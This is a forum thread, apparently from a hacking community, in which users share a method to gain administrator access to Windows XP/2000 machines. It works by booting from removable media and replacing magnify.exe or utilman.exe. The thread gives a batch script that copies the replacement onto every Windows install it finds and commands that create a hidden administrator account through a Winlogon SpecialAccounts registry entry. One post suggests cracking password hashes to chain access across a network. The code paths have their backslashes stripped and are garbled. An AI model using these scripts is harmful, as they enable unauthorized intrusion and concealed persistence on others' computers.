Jump to content

Gain SYSTEM/Administrative Access to Windows XP/2000


celltoolz
 Share

Recommended Posts

Ehm, if you try this you'll get some nice errors ;)

I'm booting from a dos floppy so I don't have systemvariables

If it would be so easy, I would have done this.

A problem I spotted is, if someone has more than just 1 windows nt system installed, that the script just copies it once.

Hmm I guess I should learn to read properly... :-(

Link to comment
Share on other sites

  • 4 weeks later...
  • Replies 196
  • Created
  • Last Reply

Top Posters In This Topic

no problem :)

I tried my "1337-get-admin-rights-prog" at several computers and i realized a problem:

it doesn't work properly if there are more than one installed win nt system o the computer because my program checks out every drive by doing a "if exist" query, so the last drive is the used one.

Does anyone know an automated workaround?

Link to comment
Share on other sites

no problem :)

I tried my "1337-get-admin-rights-prog" at several computers and i realized a problem:

it doesn't work properly if there are more than one installed win nt system o the computer because my program checks out every drive by doing a "if exist" query, so the last drive is the used one.

Does anyone know an automated workaround?

@echo on
FOR %i IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
    IF EXIST %i:ntldr (
        SET SYS=%i
        FOR %a IN (windows winnt) DO (
            IF EXIST %sys%:%asystem32winlogon.exe (
                SET WIN=%a
                copy ".magnify.exe" "%SYS%:%win%system32dllcachemagnify.exe" /Y
                copy ".magnify.exe" "%SYS%:%win%system32magnify.exe" /Y
            )
        )
    )
)

Could try that, You could also rewrite it to make it look better but that should work to copy it over to every existence of windows on every drive.

Link to comment
Share on other sites

It's not really straightforward and only for lager networks (and slightly off topic), but if you can create an admin account (boot cd, floppy, whatever) on one random machine and extract the hashes and crack them, maybe the system administrator has used the same password for some other machines and then you can make a kind of chainreaction:

One cracked machine causes another cracked machine.

And by that, maybe you can gain a large pool of masterpasswords.

I think the use of that pool is clear.

Link to comment
Share on other sites

Hello!

How do I use this tool to make a new user?

Do I use command prompt?

If so, what do I type?

And... what is the latest utilman.exe... link plz

thx

rainbowCOLOR

Anyone else find this style of writing similar to a member that recently got banned ?

Link to comment
Share on other sites

  • 3 weeks later...
  • 1 month later...

yeah, I've done a similar hack to this... I noticed that it was

already mentioned on the first page, but to replace the screensaver

file with cmd.exe and just making the account yourself, theres pros

and cons with this in comparison to your 'utilman' method, let see the

obvious con of it is definitely the 15minute wait for the screensaver to

come on, however... if your not much of a programmer and dont have

visual basic, the cmd.exe replacable looks much more attractive =p

Link to comment
Share on other sites

  • 1 month later...

After putting Debian on my pc I sadly didn't had much time for hak.5 and batch projects :(

I put FreeDOS on my thumb drive in combination with the utilman or "magnify.exe" and tested it with different computers. I like how easy it works. I post the code once again since I modified it a little bit.

net user Accountname Accountpassword /add 2>nul
net localgroup Administratoren Accountname /add 2>nul || net localgroup administrators Accountname /add 2>nul
net localgroup Benutzer Accountname /delete 2>nul || net localgroup users Accountname /delete 2>nul
reg.exe add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v Accountname /t REG_DWORD /d 0 2>nul

This code can be compiled via any batch compiler or again modified to be compiled by the Nullsoft Scripable Install System (very dirty I guess).

Link to comment
Share on other sites

  • 3 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...